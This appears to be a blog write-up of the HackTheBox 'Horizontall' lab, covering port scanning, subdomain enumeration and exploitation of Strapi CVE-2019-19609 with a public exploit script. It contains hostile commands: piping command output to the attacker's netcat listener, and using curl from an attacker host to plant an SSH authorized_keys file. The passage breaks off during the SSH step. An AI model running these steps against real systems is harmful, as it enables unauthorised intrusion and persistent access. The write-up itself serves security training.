<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Horizontall - HackTheBox Writeup (10.10.11.105) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Horizontall - HackTheBox Writeup (10.10.11.105)">
<meta name="description" content="Easy-difficulty Linux box on exploiting CVE-2019-19609 on Strapi and CVE-2021-3129 on Laravel. A good refresher on reverse tunnelling with Chisel and subdomain enumeration techniques.">
<meta property="og:description" content="Easy-difficulty Linux box on exploiting CVE-2019-19609 on Strapi and CVE-2021-3129 on Laravel. A good refresher on reverse tunnelling with Chisel and subdomain enumeration techniques.">
<meta property="og:image" content="https://www.hackthebox.com/storage/avatars/e4ec7d8504fdb58b5e6b7ddc82aafc77.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.com/storage/avatars/e4ec7d8504fdb58b5e6b7ddc82aafc77.png"></span>
</div>
<h1 class="Header__Title">Horizontall - HackTheBox Writeup (10.10.11.105)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Sat, Jan 29, 2022</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--green">
<a href="tag/Easy">Easy</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Strapi">Strapi</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Laravel">Laravel</a>
</span>
</div>
<div>
Easy-difficulty Linux box on exploiting CVE-2019-19609 on Strapi and CVE-2021-3129 on Laravel. A good refresher on reverse tunnelling with Chisel and subdomain enumeration techniques.
</div>
</header>
<article id="https://www.notion.so/f4a17f4a3739499f8d1c44de905a7f6f" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/3606b97be4f941959a8fafa1ef56b000" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/3606b97be4f941959a8fafa1ef56b000"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Preface</span></span></h2><div id="https://www.notion.so/a392cd52514840fe977e9e8c81a90527" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It’s been a while since my last post, but with a new year comes new boxes to pwn 😇</span></span></p></div><div id="https://www.notion.so/03b53de77e7d4b8986d6a77951dfd7ab" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">To improve my notetaking and make the posts more readable, I’ve also decided to stay away from the usual dot-point format and switch to a paragraph approach, similar to my CTF challenge writeups. 
This should allow me to explain my thought process a little bit better.</span></span></p></div><h2 id="https://www.notion.so/2426d06749c844f4882b57aa85de0dfb" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/2426d06749c844f4882b57aa85de0dfb"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Reconnaissance</span></span></h2><div id="https://www.notion.so/e2918e086f8f4585a37c4693b1e0954a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Before we do anything, let’s add the target IP and hostname to our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file:</span></span></p></div><div id="https://www.notion.so/ab7edb32cfaa40f292e963b4966af528" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo nano /etc/hosts</code></span></span></p></div><pre id="https://www.notion.so/e066621b57bf47a192eadd937591e38b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.11.105 horizontall.htb</span></span></span></code></pre><div id="https://www.notion.so/ace85904ff744143bdc8e7bb58187f20" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p 
class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">As usual, we perform a simple port scan to see what kind of services the target is running.</span></span></p></div><div id="https://www.notion.so/2b6f85c4283e45b983fd451638333e2f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.11.105 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/9daf213a8b294ce0a4ff375da9c913b0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds</span></span></span></code></pre><div id="https://www.notion.so/886057493caf4294b97421cd04f5eed8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We see that the target has ports 22 and 80 open. Let’s get more information about these two services by performing a script scan (-sC) with version detection enabled (-sV):</span></span></p></div><div id="https://www.notion.so/d6b30e9a3d674b2e9a2ecb67d7fbe658" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,80 10.10.11.105 > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/67f57c7ed71144d7b3e89a765fa17262" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: horizontall
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds</span></span></span></code></pre><div id="https://www.notion.so/f0eb8f06012a498aa0378b385b09612f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">The target is running an SSH server on port 22, and a website with Nginx 1.14.0 on port 80. The SSH version appears to be recent, so let’s begin by enumerating the HTTP server.</span></span></p></div><h2 id="https://www.notion.so/24f60a5208094412b7e19ab289952801" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/24f60a5208094412b7e19ab289952801"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><div id="https://www.notion.so/7caa375bf4794bbe9713a724eb49763b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP Enumeration</strong></span></span></p></div><div id="https://www.notion.so/cbfb205cffbd4ed28718c7fc69cd353e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looking at the website on port 80, there doesn’t seem to be anything of interest. 
All of the buttons lead to dead links, and the contact box at the bottom does not seem to do anything either.</span></span></p></div><div id="https://www.notion.so/ab888e36233448a3b6aae992d0a8056e" class="Image Image--Normal"><figure><a href="https://i.imgur.com/FSRS81o.png?width=1056"><img src="https://i.imgur.com/FSRS81o.png?width=1056" style="width:1056px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/8cf616e688954ce3a6d4c92e230f311c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">From the nmap scan and the detection result from Wappalyzer (a browser extension for detecting website technologies), we see the site is running an old version of Nginx (1.14.0).</span></span></p></div><div id="https://www.notion.so/f53eb8c02e424de2ab1ee855d823163d" class="Image Image--Normal"><figure><a href="https://i.imgur.com/9K02Qod.png?width=432"><img src="https://i.imgur.com/9K02Qod.png?width=432" style="width:432px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/1440dddaf1c346b5b3b8533eef162a2e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">With that information in mind, we can try to search for vulnerabilities in that specific version of Nginx. I came across a critical off-by-one heap write vulnerability in the DNS resolver (</span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://googleprojectzero.blogspot.com/2016/12/chrome-os-exploit-one-byte-overflow-and.html">CVE-2021-23017</a></span><span class="SemanticString">) that, in theory, can lead to remote code execution. 
Unfortunately, this vulnerability could not be exploited as it requires the attacker to forge UDP packets from the DNS server, which we do not have control over. Seeing as the vulnerability can also cause the worker process to crash (DoS), I realised this was not the intended solution and moved on.</span></span></p></div><div id="https://www.notion.so/7259edd6fdcf4fefb94094a8d6222410" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">To find out more about the website’s structure, we can use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">gobuster</code></span><span class="SemanticString"> to bruteforce the directory listings on the site:</span></span></p></div><div id="https://www.notion.so/7c97a830b1f74002a5ca78136d0ff5e6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -w ~/HTB/Common/directory-list-2.3-medium.txt -u http://horizontall.htb/</code></span></span></p></div><pre id="https://www.notion.so/55e0b4a49fff4b0e9093592815ead669" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>===============================================================
/img (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]</span></span></span></code></pre><div id="https://www.notion.so/94ae48b6b1ac4e8d9e2af93be823a545" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Again, nothing interesting. The JavaScript is fairly stock-standard and seems to be from the website template; nothing useful in the CSS either.</span></span></p></div><div id="https://www.notion.so/e1d435287ddc48a7b5a7df08ac62b209" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After much time wasted enumerating the website to no avail, I tried bruteforcing other subdomains:</span></span></p></div><div id="https://www.notion.so/6bb533ac64c04f1ea0813be1dd3f7595" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster vhost -w ~/HTB/Common/subdomains-top1million-110000.txt -u http://horizontall.htb/</code></span></span></p></div><pre id="https://www.notion.so/4e50fcaa5d9e4900a0b8dc921fc73f18" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]</span></span></span></code></pre><div id="https://www.notion.so/7e5c5123b2344be1aaed1a8cb9af723b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Great! We found an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">api-prod</code></span><span class="SemanticString"> subdomain that could be useful for us. Let’s append it to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file:</span></span></p></div><div id="https://www.notion.so/1212b3bbe2954f5ea9a906e51faba413" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo nano /etc/hosts</code></span></span></p></div><pre id="https://www.notion.so/dcd717c261a742ccb0fa1749e95cbe0d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.11.105 horizontall.htb api-prod.horizontall.htb</span></span></span></code></pre><div id="https://www.notion.so/2f74df0397fb442fa40f3be36fd9bcc6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">API Subdomain Enumeration</strong></span></span></p></div><div id="https://www.notion.so/b728d962f0754bb5939307b3e4245748" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Visiting the new API subdomain, we see a blank page with only the words “Welcome”:</span></span></p></div><div 
id="https://www.notion.so/87477b236b6c4b35ba81c61f87eb59d1" class="Image Image--Normal"><figure><a href="https://i.imgur.com/O93wHPh.png?width=432"><img src="https://i.imgur.com/O93wHPh.png?width=432" style="width:432px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/7a4c1ac2ae9041a98e102bc962662d96" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Repeating the previous enumeration process, let’s bruteforce the directory listings on the API subdomain with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">gobuster</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/c229ca754d3248f3a8b451ef4e8f9fc2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -w ~/HTB/Common/directory-list-2.3-medium.txt -u http://api-prod.horizontall.htb/</code></span></span></p></div><pre id="https://www.notion.so/aca180d0263a4310a931af8ca0b8dc9b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>===============================================================
/reviews (Status: 200) [Size: 507]
/users (Status: 403) [Size: 60]
/admin (Status: 200) [Size: 854]</span></span></span></code></pre><div id="https://www.notion.so/6098ac9962434534a46178ba23f351d5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Browsing the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/reviews</code></span><span class="SemanticString"> path, we can find some very nicely written customer reviews:</span></span></p></div><div id="https://www.notion.so/99f2fccda11d41e48e1e4dfe10565b20" class="Image Image--Normal"><figure><a href="https://i.imgur.com/dpcxAud.png?width=576"><img src="https://i.imgur.com/dpcxAud.png?width=576" style="width:576px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/bc19f6bc82ee448ab77f3da5f2931c6f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Visiting </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/admin</code></span><span class="SemanticString">, we are redirected to a login page for a Strapi CMS dashboard:</span></span></p></div><div id="https://www.notion.so/c503b6de4f2c489693a9331ab63e6a1c" class="Image Image--Normal"><figure><a href="https://i.imgur.com/yQuh1dK.png?width=720"><img src="https://i.imgur.com/yQuh1dK.png?width=720" style="width:720px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><h2 id="https://www.notion.so/0edf9a2699e84cbb8dc5a4ca333d73c5" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/0edf9a2699e84cbb8dc5a4ca333d73c5"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 
3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><div id="https://www.notion.so/95dacbecb0d34a5a8a0e7f7d32324817" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Exploiting Strapi with CVE-2019-19609</strong></span></span></p></div><div id="https://www.notion.so/cf5dacb5193d4c359ff2a1f2497be082" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">A quick search for Strapi reveals the software had suffered from an unauthenticated RCE vulnerability in its plugin install component of the admin panel (</span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19609">CVE-2019-19609</a></span><span class="SemanticString">). The vulnerability is caused by insufficient input sanitisation of plugin names in the Install and Uninstall Plugin components of the admin panel, so attackers can inject arbitrary shell commands to be executed by the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">execa</code></span><span class="SemanticString"> function. 
Exploits for this vulnerability are widely available online, </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.exploit-db.com/exploits/50239">here is one written by Musyoka Ian</a></span><span class="SemanticString"> (EDB-50239).</span></span></p></div><div id="https://www.notion.so/2636caf03ea84988b2ebcdca68f0d6fb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python /usr/share/exploitdb/exploits/multiple/webapps/50239.py http://api-prod.horizontall.htb/</code></span></span></p></div><pre id="https://www.notion.so/7be872632e89485fa99c7387afc53d98" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQyMjU4NjU2LCJleHAiOjE2NDQ4NTA2NTZ9.-P7dzFedeHpbuMf_Lm6o3yXbO516Dx6vquvCoRh6x1s
$> _</span></span></span></code></pre><div id="https://www.notion.so/e22b1142bf61494496900785072a3e21" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using the exploit, we successfully reset the administrator’s credentials as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">admin:SuperStrongPassword1</code></span><span class="SemanticString">, and gained the ability to execute code on the server as indicated by the prompt.</span></span></p></div><div id="https://www.notion.so/f333fec2b8294d9c891ff5172b3f7643" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$> id</code></span></span></p></div><pre id="https://www.notion.so/299db80f3a634421b0456f8b661f2fba" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">[</span>+<span class="token punctuation">]</span> Triggering Remote code executin
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Rember this is a blind RCE don't expect to see output
<span class="token punctuation">{</span><span class="token property">"statusCode"</span><span class="token operator">:</span><span class="token number">400</span><span class="token punctuation">,</span><span class="token property">"error"</span><span class="token operator">:</span><span class="token string">"Bad Request"</span><span class="token punctuation">,</span><span class="token property">"message"</span><span class="token operator">:</span><span class="token punctuation">[</span><span class="token punctuation">{</span><span class="token property">"messages"</span><span class="token operator">:</span><span class="token punctuation">[</span><span class="token punctuation">{</span><span class="token property">"id"</span><span class="token operator">:</span><span class="token string">"An error occurred"</span><span class="token punctuation">}</span><span class="token punctuation">]</span><span class="token punctuation">}</span><span class="token punctuation">]</span><span class="token punctuation">}</span></span></span></span></code></pre><div id="https://www.notion.so/289974761a4e4aa5abd695e3a26f18a4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We won’t be able to see any output with the exploit, as it is a blind RCE. 
Luckily, we can circumvent this limitation by setting up a listener on our attacker machine, then piping the victim output to us with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nc</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/77abd6c6ac7b490da4e711a0debe2903" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 9001</code></span></span></p></div><div id="https://www.notion.so/03b410478f6942529d4d3b313b3451de" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$> id | nc 10.10.14.45 9001</code></span></span></p></div><pre id="https://www.notion.so/266c81b4c02a4719a6623391c8b30858" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>listening on [any] 9001 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.105] 52682
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)</span></span></span></code></pre><div id="https://www.notion.so/84483ac118234eab8c21984ebd9eafee" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looks like we’re in as the Strapi user.</span></span></p></div><div id="https://www.notion.so/29a02d9c39644b7ca8730ac6fdb86707" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Gaining SSH access</strong></span></span></p></div><div id="https://www.notion.so/f4df705cd29f41a88e9a9f847377e62a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Still, we can do much better. Let’s grant ourselves SSH access by appending our public key to the user’s </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">authorized_keys</code></span><span class="SemanticString"> file. 
To do this, we can first copy our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">id_rsa.pub</code></span><span class="SemanticString"> file to a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">www</code></span><span class="SemanticString"> directory, and host it such that it can be accessed by the victim like so:</span></span></p></div><div id="https://www.notion.so/dee0068772bc420aa42cb841bc4be6c4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cp ~/.ssh/id_rsa.pub .</code></span></span></p></div><div id="https://www.notion.so/ad01529b52ec4fc7bbbd732e9fd28a35" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python -m http.server</code></span></span></p></div><div id="https://www.notion.so/dfbd602c4e8f497688012baea5817949" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">curl</code></span><span class="SemanticString"> on the victim machine to create an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">authorized_keys</code></span><span class="SemanticString"> file containing our public key. 
We also add the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">--create-dirs</code></span><span class="SemanticString"> option, just in case the directory doesn’t exist in our user’s folder already:</span></span></p></div><div id="https://www.notion.so/d9548c785683497dbaf5c51774135ef8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$> curl --create-dirs -o ~/.ssh/authorized_keys http://10.10.14.45:8000/authorized_keys</code></span></span></p></div><div id="https://www.notion.so/db68a160292c4008b977729fe86d1b9b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can then simply SSH in as the Strapi user:</span></span></p></div><div id="https://www.notion.so/a603da292e4c4d7baf2f6ab400fdcf6e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh strapi@horizontall.htb</code></span></span></p></div><div id="https://www.notion.so/b905041790584200a325635d3949173d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p 